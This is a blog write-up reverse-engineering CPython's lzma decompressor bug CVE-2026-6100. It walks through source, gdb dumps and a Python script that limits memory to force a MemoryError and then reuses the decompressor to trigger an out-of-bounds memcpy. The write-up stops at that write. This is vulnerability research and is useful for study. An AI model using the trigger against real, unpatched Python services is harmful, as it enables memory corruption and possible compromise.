Exploiting CVE-2026-6100 for Amusement and Misery

17 Apr, 2026

6550 words | 31 minutes

So, according to my phone’s screen time statistics, I spend, on average, about 1.5 hours of a day on Twitter dot com, usually ranging from 1h to 2h. I’d open the app up to 125 times with an average of about 90? opens in a day, which means I quite literally spend, on average ($\mu$), about a minute doomscrolling at a time. The data is probably a lot more left skewed ‘cause there’s definitely moments where I open Twitter for, like, ten seconds, wonder what the hell I’m doing with my life, then close it.

Anyways, the other day I got this tweet on my feed, sandwiched between a 480p recording of Ninajirachi x Porter Robinson’s Wannacry (and that’s a good song title!) and a tweet announcing new Needy Streamer Overload merch:


Fig: The Tweet

I know the words “Python” and “Use-after-free”. I haven’t documented trying to write a CVE PoC before. Let’s see if we can create a full exploit chain with this!

The Bug

The Bug is the pseudonym of Kevin Martin, an extremely prolific UK producer and musician. He was a member of GOD, one of the best jazzcore and industrial metal bands of all time, and under the moniker of The Bug he produces real eclectic grime/hip-hop/industrial/dancehall/dubstep. First time I ever heard of him was that one-off single he made with Death Grips.

Anyway, let’s read the CVE report and try to understand what’s going on.

The CVE Report

The CVE report in full reads as such:

Use-after-free in lzma.LZMADecompressor, bz2.BZ2Decompressor, and gzip.GzipFile after re-use under memory pressure

Use-after-free (UAF) was possible in the lzma.LZMADecompressor, bz2.BZ2Decompressor, and gzip.GzipFile when a memory allocation fails with a MemoryError and the decompression instance is re-used. This scenario can be triggered if the process is under memory pressure. The fix cleans up the dangling pointer in this specific error condition. The vulnerability is only present if the program re-uses decompressor instances across multiple decompression calls even after a MemoryError is raised during decompression. Using the helper functions to one-shot decompress data such as lzma.decompress(), bz2.decompress(), gzip.decompress(), and zlib.decompress() are not affected as a new decompressor instance is used per call. If the decompressor instance is not re-used after an error condition, this usage is similarly not vulnerable.

So, some things to note:

This is exploitable under “memory pressure”. This… will become important later.
This requires the reuse of a decompressor instance even after a MemoryError occurs.
This affects the Python implementations of LZMA, BZ2 and Gzip, which implies some shared logic fault in their implementations.
Not included in the Description but instead down below under the CWEs, it’s stated that this is both a UAF and an OOB Write. Huh!

Well, send patches or die, right? Let’s see what the actual fix looks like for the affected modules.

The Fix

Here’s the pull request with the fixes implemented. We’ve got four files changed and… ooh. It really is just a UAF cleanup edit.


Fig: The Fixes

In the three affected decompression modules, there’s just a line added to each of their decompression functions to clear out some next_in field on error. Well, with the limited information that we have, let’s start working backwards through one of them.

LZMA has the coolest name of the bunch, so I’m gonna go with that, naturally.

Understanding `_lzmamodule.c`

We’re reverse engineers, so we read our code in reverse too!

Let’s start from the very end, the error block that we’re so concerned with:

1101...
1102error:
1103    lzs->next_in = NULL;
1104    Py_XDECREF(result);
1105    return NULL;
1106}

Recall that we’re supposed to hit this error block through a MemoryError of sorts. Looking at our gotos, we’ve got a candidate:

1084    /* Allocate if necessary */
1085    if (d->input_buffer == NULL) {
1086        d->input_buffer = PyMem_Malloc(lzs->avail_in);
1087        if (d->input_buffer == NULL) {
1088            PyErr_SetNone(PyExc_MemoryError);
1089            goto error;
1090        }
1091        d->input_buffer_size = lzs->avail_in;
1092    }

So if we somehow hit the condition of d->input_buffer being NULL, it will trigger a PyMem_Malloc requesting size lzs->avail_in, which on failure will raise a MemoryError and fallthrough to the error block. So far, so good. What the fuck are d and lzs?

983static PyObject *
984decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
985{
986    char input_buffer_in_use;
987    PyObject *result;
988    lzma_stream *lzs = &d->lzs;
989...

Okay, cool. Decompressor struct and lzma_stream struct. The Decompressor is defined in this file, thankfully:

111typedef struct {
112    PyObject_HEAD
113    lzma_allocator alloc;
114    lzma_stream lzs;
115    int check;
116    char eof;
117    PyObject *unused_data;
118    char needs_input;
119    uint8_t *input_buffer;
120    size_t input_buffer_size;
121    PyMutex mutex;
122} Decompressor;

But our lzma_stream struct isn’t. It comes from lzma.h, which comes from liblzma. Digging around for some source code yields us the following struct:

typedef struct {
	const uint8_t *next_in; /**< Pointer to the next input byte. */
	size_t avail_in;    /**< Number of available input bytes in next_in. */
	uint64_t total_in;  /**< Total number of bytes read by liblzma. */

	uint8_t *next_out;  /**< Pointer to the next output position. */
	size_t avail_out;   /**< Amount of free space in next_out. */
	uint64_t total_out; /**< Total number of bytes written by liblzma. */
	lzma_allocator *allocator;

	/** Internal state is not visible to applications. */
	lzma_internal *internal;
	void *reserved_ptr1;
	void *reserved_ptr2;
	void *reserved_ptr3;
	void *reserved_ptr4;
	uint64_t reserved_int1;
	uint64_t reserved_int2;
	size_t reserved_int3;
	size_t reserved_int4;
	lzma_reserved_enum reserved_enum1;
	lzma_reserved_enum reserved_enum2;

} lzma_stream;

Nice, let’s start tracing the decompress function from the top down to see how to hit our block of interest.

 983static PyObject *
 984decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
 985{
 986    char input_buffer_in_use;
 987    PyObject *result;
 988    lzma_stream *lzs = &d->lzs;
 989
 990    /* Prepend unconsumed input if necessary */
 991    if (lzs->next_in != NULL) {
 992        size_t avail_now, avail_total;
 993
 994        /* Number of bytes we can append to input buffer */
 995        avail_now = (d->input_buffer + d->input_buffer_size)
 996            - (lzs->next_in + lzs->avail_in);
 997    ...
 998    /* BLAH BLAH BLAH */
 999        memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
1000        lzs->avail_in += len;
1001        input_buffer_in_use = 1;
1002    }
1003    else {
1004        lzs->next_in = data;
1005        lzs->avail_in = len;
1006        input_buffer_in_use = 0;
1007    }
1008
1009    result = decompress_buf(d, max_length);
1010    if (result == NULL) {
1011        lzs->next_in = NULL;
1012        return NULL;
1013    }
1014...

I’ve glossed over the first block that checks if lzs->next_in != NULL because the comment above it explicitly states “Prepend unconsumned input if necessary”, implying this is unlikely to be called on a first pass. Recall that our vulnerability hinges on a reuse, so the first time the function is called, it probably wouldn’t be trying to handle unconsumed input…? In fact, lzs is probably mostly uninitialised (this assumption will turn out to be true), so the relevant block is just the one where the next_in and avail_in fields are being set.

The Python code that would call this function would look a little like this:

import lzma
decompressor = lzma.LZMADecompressor()
a = decompressor.decompress(b'[data_goes_here]', max_length)

Where data and len are drawn from, well, the data you pass in. This is followed up by a call to decompress_buf, which is the handover function that actually calls lzma_code.

921/* Decompress data of length d->lzs.avail_in in d->lzs.next_in.  The output
922   buffer is allocated dynamically and returned.  At most max_length bytes are
923   returned, so some of the input may not be consumed. d->lzs.next_in and
924   d->lzs.avail_in are updated to reflect the consumed input. */
925static PyObject*
926decompress_buf(Decompressor *d, Py_ssize_t max_length)
927{
928    PyObject *result;
929    lzma_stream *lzs = &d->lzs;
930    _BlocksOutputBuffer buffer = {.writer = NULL};
931    _lzma_state *state = PyType_GetModuleState(Py_TYPE(d));
932    assert(state != NULL);
933
934    if (OutputBuffer_InitAndGrow(&buffer, max_length, &lzs->next_out, &lzs->avail_out) < 0) {
935        goto error;
936    }
937
938    for (;;) {
939        lzma_ret lzret;
940
941        Py_BEGIN_ALLOW_THREADS
942        lzret = lzma_code(lzs, LZMA_RUN);
943        Py_END_ALLOW_THREADS
944
945        if (lzret == LZMA_BUF_ERROR && lzs->avail_in == 0 && lzs->avail_out > 0) {
946            lzret = LZMA_OK; /* That wasn't a real error */
947        }
948        if (catch_lzma_error(state, lzret)) {
949            goto error;
950        }
951        if (lzret == LZMA_GET_CHECK || lzret == LZMA_NO_CHECK) {
952            FT_ATOMIC_STORE_INT_RELAXED(d->check, lzma_get_check(&d->lzs));
953        }
954        if (lzret == LZMA_STREAM_END) {
955            FT_ATOMIC_STORE_CHAR_RELAXED(d->eof, 1);
956            break;
957        } else if (lzs->avail_out == 0) {
958            /* Need to check lzs->avail_out before lzs->avail_in.
959               Maybe lzs's internal state still have a few bytes
960               can be output, grow the output buffer and continue
961               if max_lengh < 0. */
962            if (OutputBuffer_GetDataSize(&buffer, lzs->avail_out) == max_length) {
963                break;
964            }
965            if (OutputBuffer_Grow(&buffer, &lzs->next_out, &lzs->avail_out) < 0) {
966                goto error;
967            }
968        } else if (lzs->avail_in == 0) {
969            break;
970        }
971    }
972
973    result = OutputBuffer_Finish(&buffer, lzs->avail_out);
974    if (result != NULL) {
975        return result;
976    }
977
978error:
979    OutputBuffer_OnError(&buffer);
980    return NULL;
981}

This function cannot fail/return NULL as it’ll kill off the rest of our decompress call (this is called foreshadowing). Additionally, we get a sense for what max_length does here, which the docstring actually does elucidate further:

If max_length is nonnegative, returns at most max_length bytes of decompressed data. If this limit is reached and further output can be produced, self.needs_input will be set to False. In this case, the next call to decompress() may provide data as b'' to obtain more of the output.

So this is how we get our partial decompression: by calling decompress with a max_length value that is shorter than the full decompressed buffer.

Looking at the if blocks that come after, we can see what conditions we need to miss:

1041    if (d->eof) {
1042        FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 0);
1043        if (lzs->avail_in > 0) {
1044            PyObject *unused_data = PyBytes_FromStringAndSize(
1045                (char *)lzs->next_in, lzs->avail_in);
1046            if (unused_data == NULL) {
1047                goto error;
1048            }
1049            Py_XSETREF(d->unused_data, unused_data);
1050        }
1051    }
1052    else if (lzs->avail_in == 0) {
1053        lzs->next_in = NULL;
1054
1055        if (lzs->avail_out == 0) {
1056            /* (avail_in==0 && avail_out==0)
1057               Maybe lzs's internal state still have a few bytes can
1058               be output, try to output them next time. */
1059            FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 0);
1060
1061            /* If max_length < 0, lzs->avail_out always > 0 */
1062            assert(max_length >= 0);
1063        } else {
1064            /* Input buffer exhausted, output buffer has space. */
1065            FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 1);
1066        }
1067    }
1068    else {
1069        // the actual block we want to hit
1070    ...

So we can’t allow d->eof to be set high. This only happens in decompress_buf if lzret == LZMA_STREAM_END, so we will pass by this easily since we’re not consuming the full stream.

Similarly, we coast past lzs->avail_in == 0 as we intentionally leave some residual data, so these if blocks aren’t really a problem.

Now, what happens when you call the function again? Before the patch, the lzs->next_in field doesn’t get NULLd out. We know that this will contain a pointer to our input data of sorts (does it get advanced or modified during the call to lzma_code? Easiest way to find out is by debugging later!), so let’s actually trace the non-NULL block of decompress now:

 991    if (lzs->next_in != NULL) {
 992        size_t avail_now, avail_total;
 993
 994        /* Number of bytes we can append to input buffer */
 995        avail_now = (d->input_buffer + d->input_buffer_size)
 996            - (lzs->next_in + lzs->avail_in);
 997
 998        /* Number of bytes we can append if we move existing
 999           contents to beginning of buffer (overwriting
1000           consumed input) */
1001        avail_total = d->input_buffer_size - lzs->avail_in;
1002
1003        if (avail_total < len) {
1004            size_t offset = lzs->next_in - d->input_buffer;
1005            uint8_t *tmp;
1006            size_t new_size = d->input_buffer_size + len - avail_now;
1007
1008            /* Assign to temporary variable first, so we don't
1009               lose address of allocated buffer if realloc fails */
1010            tmp = PyMem_Realloc(d->input_buffer, new_size);
1011            if (tmp == NULL) {
1012                PyErr_SetNone(PyExc_MemoryError);
1013                return NULL;
1014            }
1015            d->input_buffer = tmp;
1016            d->input_buffer_size = new_size;
1017
1018            lzs->next_in = d->input_buffer + offset;
1019        }
1020        else if (avail_now < len) {
1021            memmove(d->input_buffer, lzs->next_in,
1022                    lzs->avail_in);
1023            lzs->next_in = d->input_buffer;
1024        }
1025        memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
1026        lzs->avail_in += len;
1027        input_buffer_in_use = 1;
1028    }

Eyeballing this, we can see where the OOB Write is. It’s probably all the way down at the end, with that pesky memcpy. We have a dangling pointer to data (or something related) since we never cleared out lzs->next_in, and now it will copy whatever new data we’re passing in to an address past that. If next_in and avail_in are untouched by the previous call, we actually just get a direct OOB Write to whatever memory lies right after the original data!

Okay, so we’ve got a rough idea of what’s going on. Pretty straightforward, too:

Somehow trigger the MemoryError for PyMem_Malloc(lzs->avail_in).
Call decompress on the same Decompressor object with the residual data in the lzs struct, which should trigger an OOB Write of arbitrary data to the position right after the original data.

So, shall we?

Pressure Torture

On Venetian Snares’ album “Doll Doll Doll”, there’s a track called “Pressure Torture”. It’s a 7:49 minute track of pummelling snares, bass strikes and, of course, utterly fucked up chopped Amen Breaks. It’s music made to beat you up; hardly for pleasure, hardly for enjoyment.

Anyways, we need to somehow get PyMem_Malloc to fail. The CVE report gives us a clue: “This scenario can be triggered if the process is under memory pressure.”.

Let’s do a little bit of debugging to figure out how we can attain that pressure.

Tracing the `decompress` Call

I am a staunch believer that you don’t always need symbols during debugging. If you’re good, you should just be able to eyeball the structs and see where the data should be without needing text all over the fucking place.

However, I decided to give in for once and compiled the last Python commit prior to this patch (480edc1aae0) in debug mode by throwing in a nifty little ./configure --with-pydebug CFLAGS="-g3 -O0". Blasphemous.

Let’s write a simple script to test the decompress function:

import lzma

decompressor = lzma.LZMADecompressor()

# we need to start with some valid data at first, at least
t = bytearray(b'asdfgda')
t = lzma.compress(t)
a = decompressor.decompress(t, 1)

We can then set a breakpoint in gdb by calling b ../Modules/_lzmamodule.c:decompress to begin tracing.

[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────── [0m[36mcode:x86:64[1m[38;5;240m ────[0m
   [1m[38;5;240m0x7ffff7b2d0db <decompress+000c> mov    QWORD PTR [rbp-0x70], rsi[0m
   [1m[38;5;240m0x7ffff7b2d0df <decompress+0010> mov    QWORD PTR [rbp-0x78], rdx[0m
   [1m[38;5;240m0x7ffff7b2d0e3 <decompress+0014> mov    QWORD PTR [rbp-0x80], rcx[0m
[31m●[32m→ 0x7ffff7b2d0e7 <decompress+0018> mov    rax, QWORD PTR [rbp-0x68][39m
   0x7ffff7b2d0eb <decompress+001c> add    rax, 0x28
   0x7ffff7b2d0ef <decompress+0020> mov    QWORD PTR [rbp-0x50], rax
   0x7ffff7b2d0f3 <decompress+0024> mov    rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d0f7 <decompress+0028> mov    rax, QWORD PTR [rax]
   0x7ffff7b2d0fa <decompress+002b> test   rax, rax
[1m[38;5;240m─────────────────────────────────────────────────────────── [0m[36msource:../Modules/_lzmamodule.c+988[1m[38;5;240m ────[0m
 [1m[38;5;240m   983[0m	[1m[38;5;240m static PyObject *[0m
 [1m[38;5;240m   984[0m	[1m[38;5;240m decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)[0m
 [1m[38;5;240m   985[0m	[1m[38;5;240m {[0m
 [1m[38;5;240m   986[0m	[1m[38;5;240m     char input_buffer_in_use;
[0m [1m[38;5;240m   987[0m	[1m[38;5;240m     PyObject *result;[0m
             // [33md[39m=0x00007fffffff9ea8  →  [...]  →  0x0000000000000002, [33mlzs[39m=0x00007fffffff9ec0  →  0x0000000001000000
[32m →  988[39m	[32m     lzma_stream *lzs = &d->lzs;[39m
    989	
    990	     /* Prepend unconsumed input if necessary */
    991	     if (lzs->next_in != NULL) {
    992	         size_t avail_now, avail_total;
    993	
[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────────── [0m[36mthreads[1m[38;5;240m ────[0m
[[32m#0[39m] Id 1, Name: "python", [31mstopped[39m [34m0x7ffff7b2d0e7[39m in [33mdecompress[39m (), reason: [35mBREAKPOINT[39m

Here we can start checking off some of our assumptions. Stepping a little then pretty printing the lzma_stream struct at this point shows us it is, in fact, largely uninitialized:

[1m[32mgef➤  [0mprint *(lzma_stream *) 0x00007ffff7c2e468
[36m$3[39m = {
  [36mnext_in[39m = [34m0x0[39m,
  [36mavail_in[39m = 0x0,
  [36mtotal_in[39m = 0x0,
  [36mnext_out[39m = [34m0x0[39m,
  [36mavail_out[39m = 0x0,
  [36mtotal_out[39m = 0x0,
  [36mallocator[39m = [34m0x7ffff7c2e450[39m,
  [36minternal[39m = [34m0x555555ec8a10[39m,
  [36mreserved_ptr1[39m = [34m0x0[39m,
  [36mreserved_ptr2[39m = [34m0x0[39m,
  [36mreserved_ptr3[39m = [34m0x0[39m,
  [36mreserved_ptr4[39m = [34m0x0[39m,
  [36mseek_pos[39m = 0x0,
  [36mreserved_int2[39m = 0x0,
  [36mreserved_int3[39m = 0x0,
  [36mreserved_int4[39m = 0x0,
  [36mreserved_enum1[39m = [36mLZMA_RESERVED_ENUM[39m,
  [36mreserved_enum2[39m = [36mLZMA_RESERVED_ENUM[39m
}

and it will get filled in with our input compressed data once we go further in:

[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────── [0m[36mcode:x86:64[1m[38;5;240m ────[0m
   [1m[38;5;240m0x7ffff7b2d29d <decompress+01ce> mov    rax, QWORD PTR [rbp-0x50][0m
   [1m[38;5;240m0x7ffff7b2d2a1 <decompress+01d2> mov    rdx, QWORD PTR [rbp-0x78][0m
   [1m[38;5;240m0x7ffff7b2d2a5 <decompress+01d6> mov    QWORD PTR [rax+0x8], rdx[0m
 [32m→ 0x7ffff7b2d2a9 <decompress+01da> mov    BYTE PTR [rbp-0x51], 0x0[39m
   0x7ffff7b2d2ad <decompress+01de> mov    rdx, QWORD PTR [rbp-0x80]
   0x7ffff7b2d2b1 <decompress+01e2> mov    rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2d2b5 <decompress+01e6> mov    rsi, rdx
   0x7ffff7b2d2b8 <decompress+01e9> mov    rdi, rax
   0x7ffff7b2d2bb <decompress+01ec> call   0x7ffff7b2cec7 <decompress_buf>
[1m[38;5;240m────────────────────────────────────────────────────────── [0m[36msource:../Modules/_lzmamodule.c+1032[1m[38;5;240m ────[0m
 [1m[38;5;240m  1027[0m	[1m[38;5;240m         input_buffer_in_use = 1;[0m
 [1m[38;5;240m  1028[0m	[1m[38;5;240m     }[0m
 [1m[38;5;240m  1029[0m	[1m[38;5;240m     else {[0m
 [1m[38;5;240m  1030[0m	[1m[38;5;240m         lzs->next_in = data;[0m
 [1m[38;5;240m  1031[0m	[1m[38;5;240m         lzs->avail_in = len;[0m
                 // [33minput_buffer_in_use[39m=0x0
[32m → 1032[39m	[32m         input_buffer_in_use = 0;[39m
   1033	     }
   1034	
   1035	     result = decompress_buf(d, max_length);
   1036	     if (result == NULL) {
   1037	         lzs->next_in = NULL;
...
[1m[38;5;240m────────────────────────────────────────────────────────────────────────────────────────────────────[0m
[1m[32mgef➤  [0mprint *(lzma_stream *) 0x00007ffff7c2e468
[36m$4[39m = {
  [36mnext_in[39m = [34m0x7ffff77b9ce0[39m "\3757zXZ",
  [36mavail_in[39m = 0x40,
  [36mtotal_in[39m = 0x0,
  [36mnext_out[39m = [34m0x0[39m,
  [36mavail_out[39m = 0x0,
...

We continue execution past decompress_buf to see how this changes our structs:

[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────── [0m[36mcode:x86:64[1m[38;5;240m ────[0m
   [1m[38;5;240m0x7ffff7b2d2b5 <decompress+01e6> mov    rsi, rdx[0m
   [1m[38;5;240m0x7ffff7b2d2b8 <decompress+01e9> mov    rdi, rax[0m
   [1m[38;5;240m0x7ffff7b2d2bb <decompress+01ec> call   0x7ffff7b2cec7 <decompress_buf>[0m
[31m●[32m→ 0x7ffff7b2d2c0 <decompress+01f1> mov    QWORD PTR [rbp-0x20], rax[39m
   0x7ffff7b2d2c4 <decompress+01f5> cmp    QWORD PTR [rbp-0x20], 0x0
   0x7ffff7b2d2c9 <decompress+01fa> jne    0x7ffff7b2d2e0 <decompress+529>
   0x7ffff7b2d2cb <decompress+01fc> mov    rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d2cf <decompress+0200> mov    QWORD PTR [rax], 0x0
   0x7ffff7b2d2d6 <decompress+0207> mov    eax, 0x0
...
[1m[32mgef➤  [0mprint *(Decompressor *)0x00007fffffff9ea8
[36m$5[39m = {
  [36mob_base[39m = {
    {
      [36mob_refcnt_full[39m = 0x7ffff7c2e440,
      {
        [36mob_refcnt[39m = 0xf7c2e440,
        [36mob_overflow[39m = 0x7fff,
        [36mob_flags[39m = 0x0
      },
      [36m_aligner[39m = 0x40
    },
    [36mob_type[39m = [34m0x7fffffff9ed0[39m
  },
...
  [36mcheck[39m = 0xf7b2c04f,
  [36meof[39m = 0xff,
  [36munused_data[39m = [34m0x0[39m,
  [36mneeds_input[39m = 0x2,
  [36minput_buffer[39m = [34m0x7fffffffa1c0[39m "\300\234{\367\377\177",
  [36minput_buffer_size[39m = 0x7ffff7c2e440,
  [36mmutex[39m = {
    [36m_bits[39m = 0xa0
  }
}
[1m[32mgef➤  [0mprint *(lzma_stream *)0x7ffff7c2e468
[36m$7[39m = {
  [36mnext_in[39m = [34m0x7ffff77b9cfc[39m "sdfgda",
  [36mavail_in[39m = 0x24,
  [36mtotal_in[39m = 0x1c,
  [36mnext_out[39m = [34m0x7ffff7bd1341[39m "",
  [36mavail_out[39m = 0x0,
  [36mtotal_out[39m = 0x1,
  [36mallocator[39m = [34m0x7ffff7c2e450[39m,
  [36minternal[39m = [34m0x555555ec8a10[39m,
  [36mreserved_ptr1[39m = [34m0x0[39m,
  [36mreserved_ptr2[39m = [34m0x0[39m,
  [36mreserved_ptr3[39m = [34m0x0[39m,
  [36mreserved_ptr4[39m = [34m0x0[39m,
  [36mseek_pos[39m = 0x0,
  [36mreserved_int2[39m = 0x0,
  [36mreserved_int3[39m = 0x0,
  [36mreserved_int4[39m = 0x0,
  [36mreserved_enum1[39m = [36mLZMA_RESERVED_ENUM[39m,
  [36mreserved_enum2[39m = [36mLZMA_RESERVED_ENUM[39m
}

Note that next_in now contains the remaining data, decompressed. This is likely because we passed in a very short string, so it just decompresses the whole block and goes on its merry way. Notice the changes to avail_in, total_in, avail_out, and total_out too. total_out directly reflects the amount of data we requested, while total_in goes up by 0x1c as that’s the length we’ve ingested (and thus incremented next_in by).

Also, notice how d->eof remains at 0xff and lzs->avail_in is non-zero, which means we will very cleanly fall into our target if block to trigger the bug!

Making `PyMem_Malloc` Fail

So this is the annoying bit. Intuitively, a malloc operation would only fail if for some reason, the program is unable to serve the amount of free memory requested in that malloc request. It seems unlikely that during decompression we somehow manage to assign an obscene length to lzs->avail_in, nor would there be a way to restore it to a reasonable value afterwards.

This is where the earlier statement on “memory pressure” comes in. If we manage to get the program to be in a memory exhausted state with a sufficiently fractured heap, then even a “smaller” allocation request for something like, I dunno, a megabyte? would fail.

So we need to tune our resource allocation in such a way that there’s enough free memory for everything (that is, up till decompress_buf returning) to carry on with no errors, but the moment we hit that PyMem_Malloc the program goes kaput.

We can artificially restrict the resource limits of a Python script with the following:

import resource

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = 64 * 1024 * 1024 # 64 MB

# this will set a 64 MB memory cap on the program
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit)) 

# this will restore the original resources
resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))

We can now experiment with our limits a bit. I compress some high entropy data (i.e. I ran lzma.compress(os.urandom(2*1024*1024)))) which would create both a large compressed buffer and a large uncompressed buffer. Then, we just start playing around with our resource limits until we hit something nice.

import resource
import lzma

# simulate memory exhaustion
limit = int(33 * 1024 * 1024) # by the scientific method we arrive at this to be our limit
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
print(f"cap mem at {limit / 1024 / 1024} MB")

c = b'\xfd7zXZ\x00\x00\x04...' # our 2 MB buffer
decompressor = lzma.LZMADecompressor()
a = decompressor.decompress(c, 1)

This is juuuuust nice. We manage to make it through decompress_buf without it dying there, and we hit the error path that we want.

[ Legend: [31mModified register[39m | [31mCode[39m | [32mHeap[39m | [35mStack[39m | [33mString[39m ]
[1m[38;5;240m───────────────────────────────────────────────────────────────────────────────────── [0m[36mregisters[1m[38;5;240m ────[0m
[31m$rax   [39m: 0x0
[34m$rbx   [39m: 0x00007ffff7c555dc  →  0x0a73000000000001
[31m$rcx   [39m: 0x0
[31m$rdx   [39m: 0xffffffffffffff80
...
[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────── [0m[36mcode:x86:64[1m[38;5;240m ────[0m
   [1m[38;5;240m0x7ffff7b2644f <decompress+0380> mov    rax, QWORD PTR [rax+0x8][0m
   [1m[38;5;240m0x7ffff7b26453 <decompress+0384> mov    rdi, rax[0m
   [1m[38;5;240m0x7ffff7b26456 <decompress+0387> call   0x7ffff7b234b0 <PyMem_Malloc@plt>[0m
[31m●[32m→ 0x7ffff7b2645b <decompress+038c> mov    rdx, QWORD PTR [rbp-0x68][39m
   0x7ffff7b2645f <decompress+0390> mov    QWORD PTR [rdx+0xc8], rax
   0x7ffff7b26466 <decompress+0397> mov    rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2646a <decompress+039b> mov    rax, QWORD PTR [rax+0xc8]
   0x7ffff7b26471 <decompress+03a2> test   rax, rax
   0x7ffff7b26474 <decompress+03a5> jne    0x7ffff7b2648a <decompress+955>
...

Notice how $rax is 0x0 following the PyMem_Malloc call, implying it failed and we will fallthrough to our error block, which we do!

[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────── [0m[36mcode:x86:64[1m[38;5;240m ────[0m
   [1m[38;5;240m0x7ffff7b264d4 <decompress+0405> mov    rax, QWORD PTR [rbp-0x20][0m
   [1m[38;5;240m0x7ffff7b264d8 <decompress+0409> jmp    0x7ffff7b264ec <decompress+1053>[0m
   [1m[38;5;240m0x7ffff7b264da <decompress+040b> nop    [0m
 [32m→ 0x7ffff7b264db <decompress+040c> mov    rax, QWORD PTR [rbp-0x20][39m
   0x7ffff7b264df <decompress+0410> mov    rdi, rax
   0x7ffff7b264e2 <decompress+0413> call   0x7ffff7b2393d <Py_XDECREF>
   0x7ffff7b264e7 <decompress+0418> mov    eax, 0x0
   0x7ffff7b264ec <decompress+041d> leave
   0x7ffff7b264ed <decompress+041e> ret
[1m[38;5;240m────────────────────────────────────────────────────────── [0m[36msource:../Modules/_lzmamodule.c+1103[1m[38;5;240m ────[0m
 [1m[38;5;240m  1098[0m	[1m[38;5;240m     }[0m
 [1m[38;5;240m  1099[0m	[1m[38;5;240m [0m
 [1m[38;5;240m  1100[0m	[1m[38;5;240m     return result;[0m
 [1m[38;5;240m  1101[0m	[1m[38;5;240m [0m
 [1m[38;5;240m  1102[0m	[1m[38;5;240m error:[0m
             // [33mresult[39m=0x00007fffffff9ef0  →  [...]  →  [1m[38;5;240m<_PyRuntime+10e80> add BYTE PTR [rax], al[0m
[32m → 1103[39m	[32m     Py_XDECREF(result);[39m
   1104	     return NULL;
   1105	 }
   1106	
   1107	 /*[clinic input]
   1108	 @permit_long_docstring_body

Purrrrrfect. This was done through just trial and error, and for reasons that’ll become apparent later, we’re going to need better methods. Either way, we get our PyMem_Malloc failure here, so trigger the bug should be trivial from here!

Triggering the Bug

As we’ve figure out, we need to catch our MemoryError that decompress will throw, then call decompress one more time with some input data which should get memcpy’d OOB. Let’s update our script to reflect this:

import resource
import lzma

# simulate memory exhaustion
limit = int(33 * 1024 * 1024) # by the scientific method we arrive at this to be our limit
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
print(f"cap mem at {limit / 1024 / 1024} MB")

# so our memory exhaustion is a bit the very tight
c = b'\xfd7zXZ\x00\x00\x04...' # our 2 MB buffer
decompressor = lzma.LZMADecompressor()
a = None

try:
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 1)
except MemoryError:
    pass
finally:
    # restore our resources so we struggle less post-bug
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))

input("MemError triggered, decompressing again")
a = decompressor.decompress(b'A'*16, 1)

We now just step through our script in gdb and see what happens on the decompress calls! After falling through to the error block in the first call, we can check what our lzma_stream struct looks like, knowing that it doesn’t get cleared out properly:

[1m[38;5;240m─────────────────────────────────────────────────────────────────────────────────── [0m[36mcode:x86:64[1m[38;5;240m ────[0m
   [1m[38;5;240m0x7ffff7b264e2 <decompress+0413> call   0x7ffff7b2393d <Py_XDECREF>[0m
   [1m[38;5;240m0x7ffff7b264e7 <decompress+0418> mov    eax, 0x0[0m
   [1m[38;5;240m0x7ffff7b264ec <decompress+041d> leave  [0m
 [32m→ 0x7ffff7b264ed <decompress+041e> ret    [39m
...
[1m[32mgef➤  [0mprint *(lzma_stream *)0x7ffff7c2e468
[36m$13[39m = {
  [36mnext_in[39m = [34m0x7ffff6bda06c[39m "\020J\022_%\"\024\377\017\276\226dwW*\3568\330&...,
  [36mavail_in[39m = 0x100054,
  [36mtotal_in[39m = 0x1c,
  [36mnext_out[39m = [34m0x7ffff7bd1341[39m "",
  [36mavail_out[39m = 0x0,
  [36mtotal_out[39m = 0x1,
  [36mallocator[39m = [34m0x7ffff7c2e450[39m,
  [36minternal[39m = [34m0x555555e53b50[39m,
  [36mreserved_ptr1[39m = [34m0x0[39m,
  [36mreserved_ptr2[39m = [34m0x0[39m,
  [36mreserved_ptr3[39m = [34m0x0[39m,
  [36mreserved_ptr4[39m = [34m0x0[39m,
  [36mseek_pos[39m = 0x0,
  [36mreserved_int2[39m = 0x0,
  [36mreserved_int3[39m = 0x0,
  [36mreserved_int4[39m = 0x0,
  [36mreserved_enum1[39m = [36mLZMA_RESERVED_ENUM[39m,
  [36mreserved_enum2[39m = [36mLZMA_RESERVED_ENUM[39m
}

Now, let’s continue on to the second decompress call.

We of course pass the lzs->next_in != NULL check, and both the calculated avail_now and avail_total are negative (since input_buffer and input_buffer_size in d are 0, so we just… get negative numbers), bypassing the PyMem_Realloc and memmove logic. We now land on the memcpy as expected!

[1m[38;5;240m─────────────────────────────────────────────────────────────────────────── [0m[36marguments (guessed)[1m[38;5;240m ────[0m
memcpy@plt (
   [34m$rdi[39m = 0x00007ffff6cda0c0 → 0xfdfdfdfdfdfdfd00,
   [34m$rsi[39m = 0x00007ffff77e8c40 → [33m"AAAAAAAAAAAAAAAA"[39m,
   [34m$rdx[39m = 0x0000000000000010,
   [34m$rcx[39m = 0x00007ffff6cda0c0 → 0xfdfdfdfdfdfdfd00
)
